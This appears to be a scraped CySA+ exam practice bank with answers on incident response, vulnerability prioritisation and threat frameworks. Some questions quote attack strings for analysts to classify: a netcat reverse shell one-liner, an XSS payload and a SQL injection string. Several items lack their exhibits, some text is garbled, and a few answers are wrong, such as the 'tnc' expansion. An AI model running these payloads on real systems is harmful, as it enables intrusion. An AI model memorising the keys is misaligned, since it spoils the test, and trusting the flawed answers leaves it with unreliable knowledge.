CYSA Questions 361-580

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior? A. Changes to system environment variables B. SMB network traffic related to the system process C. Recent browser history of the primary user D. Activities taken by PID 1024

Activities taken by PID 1024

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate? A. Service-level agreement B. Business process interruption C. Degrading functionality D. Proprietary system

Business process interruption

An auditor is reviewing the evidence log associated with a cyber crime. The auditor notices that a gap exists between individuals who were responsible for holding onto and transferring the evidence between individuals responsible for the investigation. Which of the following best describes the evidence handling process that was not properly followed? A. Validating data integrity B. Preservation C. Legal hold D. Chain of custody

Chain of custody

A security analyst is improving an organization's vulnerability management program. The analyst cross-checks the current reports with the system's infrastructure teams, but the reports do not accurately reflect the current patching levels. Which of the following will most likely correct the report errors? A. Updating the engine of the vulnerability scanning tool B. Installing patches through a centralized system C. Configuring vulnerability scans to be credentialed D. Resetting the scanning tool's plug-ins to default

Configuring vulnerability scans to be credentialed

A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next? A. Preparation B. Validation C. Containment D. Eradication

Containment

SIMULATION: An organization has noticed large amounts of data are being sent out of its network. An analyst is identifying the cause of the data exfiltration. INSTRUCTIONS: Select the command that generated the output in tabs 1 and 2. Review the output text in all tabs and identify the file responsible for the malicious behavior. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Command generating the output in Tab 1 - netstat -bo; Command generating the output in Tab 2 - tasklist; File responsible for malicious behavior - cmd.exe

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review? A. Cyber Threat Intelligence B. Common Vulnerabilities and Exposures C. Cyber Analytics Repository D. ATT&CK

Common Vulnerabilities and Exposures

An analyst produces a weekly endpoint status report for the management team. The report includes specific details for each endpoint in relation to organizational baselines. Which of the following best describes the report type? A. Forensics B. Mitigation C. Vulnerability D. Compliance

Compliance

Which of the following best describes the external requirements that are imposed for incident management communication? (choose two) A. Law enforcement involvement B. Compliance with regulatory requirements C. Transparency to stockholders D. Defined SLAs regarding services E. Industry advocacy group participation F. Framework guidelines

Compliance with regulatory requirements, Framework guidelines

A security analyst needs to identify a computer based on the following requirements to be mitigated: - The attack method is network based with low complexity - No privileges or user action is needed - The confidentiality and availability level is high, with a low integrity level. Given the following CVSS 3.1 output:
Computer1: CVSS3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H
Computer2: CVSS3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Computer3: CVSS3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H
Computer4: CVSS3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Which of the following machines should the analyst mitigate? A. Computer 1 B. Computer 2 C. Computer 3 D. Computer 4

Computer 4

While a security analyst for an organization was reviewing logs from web servers, the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (choose two) A. Configure the server to prefer TLS 1.3 B. Remove cipher suites that use CBC C. Configure the server to prefer ephemeral modes for key exchange D. Require client browsers to present a user certificate for mutual authentication E. Configure the server to require HSTS F. Remove cipher suites that use GCM

Configure the server to prefer TLS 1.3, Remove cipher suites that use CBC

In the last hour, a high volume of failed RDP authentication attempts have been logged on a critical server. All of the authentication attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following mitigating controls would be most effective to reduce the rate of success of this brute force attack? (choose two) A. Increase the granularity of log-on event auditing on all devices B. Enable host firewall rules to block all outbound traffic to TCP port 3389 C. Configure user account lockout after a limited number of failed attempts D. Implement a firewall block for the IP address of the remote system E. Install a third party remote access tool and disable RDP on all devices F. Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall

Configure user account lockout after a limited number of failed attempts, Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall

Thousands of computers were compromised. The compromise was detected on only three computers during the latest vulnerability scan. An analyst conducts an after-action review to determine why the vulnerability was not detected on more computers. The analyst recreates the following configuration that was used to scan the network: Which of the following best explains the reason the vulnerability was found on only three computers? A. Incorrect remote port specified B. Lack of concurrent threads dedicated C. Use of a credentialed vulnerability scan D. Configuring an incorrect subnet mask

Configuring an incorrect subnet mask

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program? A. It provides a structured way to gain information about insider threats B. It proactively facilitates real-time information sharing between the public and private sectors C. It exchanges messages in the most cost-effective way and requires little maintenance once implemented D. It is a semi-automated solution to gather threat intelligence about competitors in the same sector

It proactively facilitates real-time information sharing between the public and private sectors

Which of the following most accurately describes the Cyber Kill Chain methodology? A. It is used to correlate events to ascertain the TTPs of an attacker B. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped C. It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage D. It outlines a clear path for determining the relationships between the attacker, the technology used, and the target

It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage

Which of the following best describes root cause analysis? A. It describes the tactics, techniques, and procedures used in an incident B. It provides a detailed path outlining the origin of an issue and how to eliminate it permanently. C. It outlines the who-what-when-where-why, which is often used in conjunction with legal proceedings D. It generates a report of ongoing activities, including what was done, what is being done, and what will be done next

It provides a detailed path outlining the origin of an issue and how to eliminate it permanently

Which of the following is a benefit of the Diamond Model of Intrusion Analysis? A. It provides analytical pivoting and identifies knowledge gaps B. It guarantees that the discovered vulnerability will not be exploited again in the future C. It provides concise evidence that can be used in court D. It allows for proactive detection and analysis of attack events

It provides analytical pivoting and identifies knowledge gaps

A Chief Information Security Officer has requested a dashboard to share critical vulnerability management goals with company leadership. Which of the following would be the best to include in the dashboard? A. KPI B. MOU C. SLO D. SLA

KPI

SIMULATION: A company recently experienced a security incident. The security team has determined a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run. INSTRUCTIONS: Part 1. Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization. Part 2. Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each control may only be used once, and not all controls will be used. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Kill chain items: Phishing email - Email filtering; Active links - VPN; Malicious website access - IP blocklist; Malware download - Firewall file type filter; Malware install - Restricted local user permissions; Malware execution - Updated antivirus; File encryption - Backups.
Identify the following: Malicious executable - Payroll/xlsx; Malicious IP address - 81.161.63.103; Date/time malware entered organization - 1 Dec 2019 14:03:19

During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue? A. Legacy system B. Business process interruption C. Degrading functionality D. Configuration management

Legacy system

A company is in the middle of an incident, and customer data has been breached. Which of the following should the company contact first? A. Media B. Public relations C. Law enforcement D. Legal

Legal

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reports to the general public, as a best practice? (choose two) A. Law enforcement B. Governance C. Legal D. Manager E. Public relations F. Human resources

Legal, Public relations

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe? A. Business continuity plan B. Lessons Learned C. Forensic analysis D. Incident response plan

Lessons learned

A security administrator has found indicators of dictionary attacks against the company's external-facing portal. Which of the following should be implemented to best mitigate the password attacks? A. Multifactor authentication B. Password complexity C. Web application firewall D. Lockout policy

Lockout policy

An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using? A. MITRE ATT&CK B. OSSTMM C. Diamond Model of Intrusion Analysis D. OWASP

MITRE ATT&CK

Which of the following attack methodology frameworks should a cyber security analyst use to identify similar TTPs utilized by nation-state actors? A. Cyber kill chains B. Diamond Model of Intrusion Analysis C. OWASP testing guide D. MITRE ATT&CK matrix

MITRE ATT&CK matrix

A security analyst needs to identify an asset that should be remediated based on the following: Which of the following assets should the analyst remediate first? A. Mail server B. Domain controller C. Web server D. File server

Mail server

A security analyst runs tcpdump on the 10.203.10.22 machine and observes thousands of packets as shown below: Which of the following activities explains the tcpdump output? A. Incoming nmap -sA scan B. hping3 --udp scan over the network C. C2 communications leaving the network D. Malware beaconing

Malware beaconing

A security analyst finds an application that cannot enforce the organization's password policy. An exception is granted. As a compensating control, all users must confirm that their passwords comply with the organization's policy. Which of the following types of compensating controls is the organization using? A. Corrective B. Managerial C. Technical D. Detective

Managerial

Which of the following is the best metric to use when reviewing and addressing findings that caused an incident? A. Mean time to restore B. Mean time to respond C. Mean time to remediate D. Mean time to detect

Mean time to remediate

An analyst is evaluating the vulnerability report: Which of the following vulnerability report sections provides information about the level of impact on data confidentiality if a successful exploitation occurs? A. Payloads B. Metrics C. Vulnerability D. Profile

Metrics

A security analyst needs to develop a solution to protect a high-value asset from an exploit like a recent zero-day attack. Which of the following best describes the risk management strategy? A. Avoid B. Transfer C. Accept D. Mitigate

Mitigate

A security analyst has identified outgoing network traffic leaving the enterprise at odd times. The traffic appears to pivot across network segments and target domain servers. The traffic is then routed to a geographic location to which the company has no association. Which of the following best describes this type of threat? A. Hacktivist B. Zombie C. Insider threat D. Nation-state actor

Nation-state actor

An organization is planning to adopt a zero-trust architecture. Which of the following is most aligned with this approach? A. Network segmentation to separate sensitive systems from the rest of the network B. Whitelisting specific IP addresses that are allowed to access the network C. Trusting users who successfully authenticate once with multifactor authentication D. Automatically trusting internal network communications over external traffic

Network segmentation to separate sensitive systems from the rest of the network

The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the following should be recommended as a starting point? A. Non-persistent virtual desktop infrastructures B. Passwordless authentication C. Standard-issue laptops D. Serverless workloads

Non-persistent virtual desktop infrastructures

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender. Which of the following information security goals is the analyst most likely trying to achieve? A. Non-repudiation B. Authentication C. Authorization D. Integrity

Non-repudiation

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test? A. Hashcat B. OpenVAS C. OWASP ZAP D. Nmap

OWASP ZAP

An analyst is conducting monitoring against an authorized team that will perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for techniques to be used. Which of the following teams is the analyst a member of? A. Orange Team B. Blue Team C. Red Team D. Purple Team

Orange Team

A company classifies security groups by risk level. Any group with high-risk classification requires multiple levels of approval for member or owner changes. Which of the following inhibitors to remediation is the company utilizing? A. Organizational governance B. MOU C. SLA D. Business process interruption

Organizational governance

Which of the following characteristics ensures the security of an automated information system is the most effective and economical? A. Originally designed to provide necessary security B. Subjected to intense security testing C. Customized to meet specific security threats D. Optimized prior to the addition of security

Originally designed to provide necessary security

Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of the incidents? A. Misconfigured web application firewall B. Data integrity failure C. Outdated libraries D. Insufficient logging

Outdated libraries

A security analyst is conducting a vulnerability assessment of a company's online store. The analyst discovers a critical vulnerability in the payment processing system that could be exploited, allowing attackers to steal customer payment information. Which of the following should the analyst do next? A. Leave the vulnerability unpatched until the next scheduled maintenance window to avoid potential disruption to business B. Perform a risk assessment to evaluate the potential impact of the vulnerability and determine whether additional security measures are needed C. Ignore the vulnerability since the company recently passed a payment system compliance audit D. Patch the vulnerability as soon as possible to ensure customer payment information is secure

Patch the vulnerability as soon as possible to ensure customer payment information is secure

An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software? A. Static testing B. Vulnerability testing C. Dynamic testing D. Penetration testing

Penetration testing

Which of the following choices is most likely to cause obstacles in vulnerability remediation? A. Not meeting an SLA B. Patch prioritization C. Organizational governance D. Proprietary systems

Proprietary systems

Which of the following evidence collection methods is most likely to be acceptable in court cases? A. Copying all access files at the time of the incident B. Creating a file-level archive of all files C. Providing a full system backup inventory D. Providing a bit-level image of the hard drive

Providing a bit-level image of the hard drive

After a recent vulnerability report for a server is presented, a business must decide whether to secure the company's web-based storefront or shut it down. The developer is not able to fix the zero-day vulnerability because a patch does not exist yet. Which of the following is the best option for the business? A. Limit the API request for new transactions until a patch exists B. Take the storefront offline until a patch exists C. Identify the degrading functionality D. Put a WAF in front of the storefront

Put a WAF in front of the storefront

Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective actions? A. Lessons learned B. Reporting C. Recovery D. Root cause analysis

Recovery

Which of the following are process improvements that can be realized by implementing a SOAR solution? (choose two) A. Minimize security attacks B. Itemize tasks for approval C. Reduce repetitive tasks D. Minimize setup complexity E. Define a security strategy F. Generate reports and metrics

Reduce repetitive tasks, Generate reports and metrics

A system that provides the user interface for a critical server has potentially been corrupted by malware. Which of the following is the best recommendation to ensure business continuity? A. System isolation B. Reimaging C. Malware removal D. Vulnerability scanning

Reimaging

Which of the following is a KPI that is used to monitor or report on the effectiveness of an incident response reporting and communication program? A. Incident volume B. Mean time to detect C. Average time to patch D. Remediated incidents

Remediated incidents

A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity? A. Network pivoting B. Host scanning C. Privilege escalation D. Reverse Shell

Reverse Shell

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file? A. File debugging B. Traffic analysis C. Reverse engineering D. Machine isolation

Reverse engineering

Which of the following responsibilities does the legal team have during an incident management event? (choose two) A. Coordinate additional or temporary staffing for recovery efforts B. Review and approve new contracts acquired as a result of an event C. Advise the incident response team on matters related to regulatory reporting D. Ensure all system security devices and procedures are in place E. Conduct computer and network damage assessments for insurance F. Verify that all security personnel have the appropriate clearances

Review and approve new contracts acquired as a result of an event, Advise the incident response team on matters related to regulatory reporting

A security analyst needs to identify services in a small, critical infrastructure ICS network. Many components in the network are likely to break if they receive malformed or unusually large requests. Which of the following is the safest method to use when identifying service versions? A. Use nmap -sV to identify all assets on the network B. Use Burp Suite to conduct service identification C. Use nc to manually perform banner grabbing D. Use Nessus with restricted concurrent connections

Use Nessus with restricted concurrent connections

An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information? A. Upload the malware to the VirusTotal website B. Share the malware with the EDR provider C. Hire an external consultant to perform the analysis D. Use a local sandbox in a microsegmented environment

Use a local sandbox in a microsegmented environment

An end user forwarded an email with a file attachment to the SOC for review. The SOC analysts think the file was specifically crafted for the target. Which of the following investigative actions would best determine if the attachment was malicious? A. Review the file in Virus total to determine if the domain is associated with any phishing B. Review the email header to analyze the DKIM, DMARC, and SPF values C. Review the source IP address in AbuseIPDB D. Review the attachment's behavior in a sandbox environment while running Wireshark

Review the attachment's behavior in a sandbox environment while running Wireshark

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first? A. Document the incident and any findings related to the attack for future reference B. Interview employees responsible for managing the affected systems C. Review the log files that record all events related to client applications and user access D. Identify the immediate actions that need to be taken to contain the incident and minimize damage

Review the log files that record all events related to client applications and user access

Which of the following ensures that a team receives simulated threats to evaluate incident response performance and coordination? A. Vulnerability assessment B. Incident response playbooks C. Tabletop exercise D. Cybersecurity frameworks

Tabletop exercise

A threat intelligence analyst is updating a document according to the MITRE ATT&CK framework. The analyst selects the following behavior from a malicious actor: "The malicious actor will attempt to achieve unauthorized access to the vulnerable system" In which of the following phases should the analyst include the detection? A. Procedures B. Techniques C. Tactics D. Subtechniques

Tactics

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident? A. Back up the configuration file for all network devices B. Record and validate each connection C. Create a full diagram of the network infrastructure D. Take photos of the impacted items

Take photos of the impacted items

After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the following did the change management team fail to do? A. Implementation B. Testing C. Rollback D. Validation

Testing

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies? A. Implementing credentialed scanning B. Changing from a passive to an active scanning approach C. Implementing a central place to manage IT assets D. Performing agentless scanning

Implementing a central place to manage IT assets

A security analyst found the following vulnerability on the company's website: <INPUT TYPE="IMAGE" SRC="javascript:alert('test');"> Which of the following should be implemented to prevent this type of attack in the future? A. Input sanitization B. Output encoding C. Code Obfuscation D. Prepared statements

Input sanitization

A security analyst is assisting a software engineer with the development of a custom log collection and alerting tool (SIEM) for a proprietary system. The analyst is concerned that the tool will not detect known attacks and behavioral IoCs. Which of the following should be configured in order to resolve this issue? A. Randomly generate and store all possible hash values B. Create a default rule to alert on any change to the system C. Integrate with an open-source threat intelligence feed D. Manually add known threat signatures into the tool

Integrate with an open-source threat intelligence feed

Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal validity of these messages, the cybersecurity team recommends a digital signature be added to emails sent by the executives. Which of the following are the primary goals of this recommendation? (choose two) A. Confidentiality B. Integrity C. Privacy D. Anonymity E. Non-repudiation F. Authorization

Integrity, Non-repudiation

Which of the following best explains the importance of utilizing an incident response playbook? A. It prioritizes the business-critical assets for data recovery B. It establishes actions to execute when inputs trigger an event C. It documents the organization asset management and configuration D. It defines how many disaster recovery sites should be staged

It establishes actions to execute when inputs trigger an event

Which of the following is the most important reason for an incident response team to develop a formal incident declaration? A. To require that an incident be reported through the proper channels B. To identify and document staff who have the authority to declare an incident C. To allow for public disclosure of a security event impacting the organization D. To establish the department that is responsible for responding to an incident

To identify and document staff who have the authority to declare an incident

Which of the following best describes the key goal of the containment stage of an incident response process? A. To limit further damage from occurring B. To get services back up and running C. To communicate goals and objectives of the incident response plan D. To prevent data follow-on actions by adversary exfiltration

To limit further damage from occurring

Which of the following best explains the importance of network microsegmentation as part of a zero trust architecture? A. To allow policies that are easy to manage and less granular B. To increase the costs associated with regulatory compliance C. To limit how far an attack can spread D. To reduce hardware costs with the use of virtual appliances

To limit how far an attack can spread

Which of the following best describes the importance of KPIs in an incident response exercise? A. To identify the personal performance of each analyst B. To describe how incidents were resolved C. To reveal what the team needs to prioritize D. To expose which tools should be used

To reveal what the team needs to prioritize

Executives want to compare certain metrics from the most recent and last reporting periods to determine whether the metrics are increasing or decreasing. Which of the following would provide the necessary information to satisfy this request? A. Count level B. Trending analysis C. Impact assessment D. Severity score

Trending analysis

An incident response team is assessing attack vectors of malware that is encrypting data with ransomware. There are no indications of a network-based intrusion. Which of the following is the most likely root cause of the incident? A. USB drop B. LFI C. Cross-site forgery D. SQL injection

USB drop

During normal security monitoring activities, the following activity was observed: cd C:\Users\Documents\HR\Employees takeown /f .* SUCCESS: Which of the following best describes the potentially malicious activity observed? A. Registry changes or anomalies B. Data exfiltration C. Unauthorized privileges D. File configuration changes

Unauthorized privileges

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades. Which of the following is the best method to remediate the bugs? A. Reschedule the upgrade and deploy the patch B. Request an exception to exclude the patch from the installation C. Update the risk register and request a change to the SLA D. Notify the incident response team and rerun the vulnerability scan

Update the risk register and request a change to the SLA

An organization has a critical financial application hosted online that cannot send event logs to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations? A. Configure a new SIEM specific to the management of hosted environments B. Subscribe to a threat feed related to the vendor's application C. Use a vendor-provided API to automate pulling the logs in real time D. Download and manually import the logs outside of business hours

Use a vendor provided API to automate pulling the logs in real time

A SOC analyst wants to improve the proactive detection of malicious emails before they are delivered to the destination inbox. Which of the following is the best approach the SOC analyst can recommend? A. Install UEBA software on the network B. Validate and quarantine emails with invalid DKIM and SPF headers C. Implement an EDR system on each endpoint D. Deploy a DLP platform to block unauthorized and suspicious content

Validate and quarantine emails with invalid DKIM and SPF headers

K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of code: SELECT ' From userjdata WHERE Username = 0 and userid8 1 or 1=1;-- Which of the following controls would be best to implement? A. Deploy a wireless application protocol B. Remove the end-of-life component C. Implement proper access control D. Validate user input

Validate user input

During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap? A. Implementation B. User acceptance testing C. Validation D. Rollback

Validation

A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report? A. Implement a vulnerability scan to determine whether the environment is at risk B. Block the IP addresses and domains from the report in the web proxy and firewalls C. Verify whether the information is relevant to the organization D. Analyze the web application logs to identify any suspicious or malicious activity

Verify whether the information is relevant to the organization

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Which of the following vulnerabilities should be patched first? A. Vulnerability 1 B. Vulnerability 2 C. Vulnerability 3 D. Vulnerability 4

Vulnerability 1

A security manager is looking at third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following: Which of the following vulnerabilities should be prioritized? A. Vulnerability 1 B. Vulnerability 2 C. Vulnerability 3 D. Vulnerability 4

Vulnerability 2

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit? A. Reconnaissance B. Weaponization C. Exploitation D. Installation

Weaponization

Which of the following would most likely be used to update a dashboard that integrates with multiple vendor tools? A. Webhooks B. Extensible Markup Language C. Threat feed combination D. JavaScript Object Notation

Webhooks

A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to analyze network traffic to search for malicious activity? A. WAF B. Wireshark C. EDR D. Nmap

Wireshark

A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst? A. Ask another team member to demonstrate their process B. Email a link to a website that shows someone demonstrating a similar process C. Let the junior analyst research and develop a process D. Write a step-by-step document on the team wiki outlining the process

Write a step-by-step document on the team wiki outlining the process

Which of the following makes STIX and OpenIoC information readable by both humans and machines? A. XML B. URL C. OVAL D. TAXII

XML

A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next? A. tiki B. phpList C. shtml.exe D. sshome

phpList

A security analyst reviews the following Nikto scan: Which of the following should the security administrator investigate next? A. tiki B. phpList C. shtml.exe D. sshome

shtml.exe

An analyst is trying to capture anomalous traffic from a compromised host. Which of the following are the best tools for achieving this objective? (choose two) A. tcpdump B. SIEM C. Vulnerability scanner D. Wireshark E. Nmap F. SOAR

tcpdump, Wireshark

After an upgrade to a new EDR, a security analyst received reports that several endpoints were not communicating with the SaaS provider to receive critical threat signatures. To comply with the incident response playbook, the security analyst was required to validate connectivity to ensure communications. The security analyst ran a command that provided the following output: ComputerName: comptia007 RemotePort: 443 InterfaceAlias: Ethernet 3 TcpTestSucceeded: False Which of the following did the analyst use to ensure connectivity? A. nmap B. tnc C. ping D. tracert

tnc (trusted network communications)

A web application has a function to retrieve content from an internal URL to identify CSRF attacks in the logs. The security analyst is building a regular expression that will filter out the correctly formatted requests. The target URL is https://10.1.2.3/api, and the receiving API only accepts GET requests and uses a single integer argument named "id". Which of the following regular expressions should the analyst use to achieve the objectives? A. (?https://10\.1\.2\.3/api\?id=[0-9]+) B. "https://10\.1\.2\.3/api\?id=\d+ C. (?:"https://10\.1\.2\.3/api\?id-[0-9]+) D. https://10\.1\.2\.3/api\?id**0-9J$

"https://10\.1\.2\.3/api\?id=\d+

A user is suspected of violating policy by logging in to a Linux VM during non-business hours. Which of the following system files is the best way to track the user's activities? A. /var/log/secure B. /etc/motd C. /var/log/messages D. /etc/password

/var/log/secure

A junior security analyst opened ports on the company's firewall, and the company experienced a data breach. Which of the following most likely caused the data breach? A. Environmental hacktivist B. Accidental insider threat C. Nation-state D. Organized crime group

Accidental insider threat

An analyst views the following log entries: The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial-of-service attempts, which are more important than ensuring vendor data access. Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation? A. 121.19.30.221 B. 134.17.188.5 C. 202.180.1582 D. 216.122.5.5

121.19.30.221

An organization has tracked several incidents that are listed on the following table: Which of the following is the organization's MTTD? A. 140 B. 150 C. 160 D. 180

160

SIMULATION: A systems administrator is reviewing the output of a vulnerability scan. Instructions: Review the information in each tab. Based on the organization's environment architecture and remediation standards, select the server to be patched within 14 days and select the appropriate technique and mitigation.

192.168.60.5 Patch; upload signed certificate from trusted third party provider

A company patches its servers using automation software. Remote SSH or RDP connections are allowed to servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary: Which of the following vulnerability IDs should the analyst address first? A. 1 B. 2 C. 3 D. 4

2

A security analyst needs to prioritize vulnerabilities for patching. Given the following vulnerability and system information: Which of the following systems should the analyst patch? A. 1 B. 2 C. 3 D. 4 E. 5 F. 6

3

A security analyst working for an airline is prioritizing vulnerabilities found on a system. The system has the following requirements: - Can store periodically audited documents required for takeoffs and landings - Can keep critical records regarding the company's operations - Data can be made public upon request and authorization Which of the following vulnerabilities should be remediated first? A. A broken access control vulnerability impacting data integrity B. A heap overflow vulnerability impacting the system's usability C. A DoS vulnerability impacting the system's availability D. A zero-day vulnerability impacting the system's confidentiality

A broken access control vulnerability impacting data integrity

A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likely use for this task? A. A regular expression in Bash B. Filters in the vi editor C. Variables in a PowerShell script D. A playbook in a SOAR tool

A regular expression in Bash

A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks? A. A web application firewall B. A network intrusion detection system C. A vulnerability scanner D. A web proxy

A web application firewall

A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event that a threat is detected. Which of the following should the analyst utilize to best accomplish this goal? A. SMB Share B. API endpoint C. SMTP notification D. SNMP trap

API endpoint

Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms? A. STIX/TAXII B. APIs C. Data enrichment D. Threat feed

APIs

A Chief Information Security Officer has decided the cost to protect an asset is greater than the cost of losing the asset. Which of the following risk management principles is the CISO following? A. Accept B. Avoid C. Transfer D. Mitigate

Accept

Which of the following risk management decisions should be considered after evaluating all other options? A. Transfer B. Acceptance C. Mitigation D. Avoidance

Acceptance

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP? A. Add the IP address to the EDR deny list B. Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification C. Implement a prevention policy for the IP on the WAF D. Activate the scan signatures for the IP on the NGFWs

Add the IP address to the EDR deny list

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code? A. Address space layout randomization B. Data execution prevention C. Stack canary D. Code Obfuscation

Address space layout randomization

Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of? A. Configuration management B. Compensating control C. Awareness, education, and training D. Administrative control

Administrative control

The Chief Executive Officer (CEO) has been notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO initiate? A. Alert department managers to speak privately with affected staff B. Schedule a press release to inform other service provider customers of the compromise C. Disclose to all affected parties in the Chief Operating Officer for discussion and resolution D. Verify legal notification requirements of PII and SPII in the legal and human resource departments

Alert department managers to speak privately with affected staff

During a training exercise, a security analyst must determine the vulnerabilities to prioritize. The analyst reviews the following vulnerability scan output: Which of the following issues should the analyst address first? A. Allows anonymous read access to /etc/password B. Allows anonymous read access via an FTP connection C. Microsoft Defender security definition updates disabled D. Less command allows for escape exploit via terminal

Allows anonymous read access to /etc/password

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log: Which of the following is most likely occurring, based on the events in the log? A. An adversary is attempting to find the shortest path of compromise B. An adversary is performing a vulnerability scan C. An adversary is escalating privileges D. An adversary is performing a password stuffing attack

An adversary is performing a vulnerability scan

An analyst receives an alert for suspicious IIS log activity and reviews the following entries: 2024-05-23 15:57:05 10.203.10.16 HEAT/ - 80 - 10.203.10.17 DirBuster - 1.0- RCI+(http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project) Which of the following will the analyst infer from the logs? A. An attacker is performing network lateral movement B. An attacker is conducting reconnaissance of the website C. An attacker is exfiltrating data from the network D. An attacker is cloning the website

An attacker is conducting reconnaissance of the website

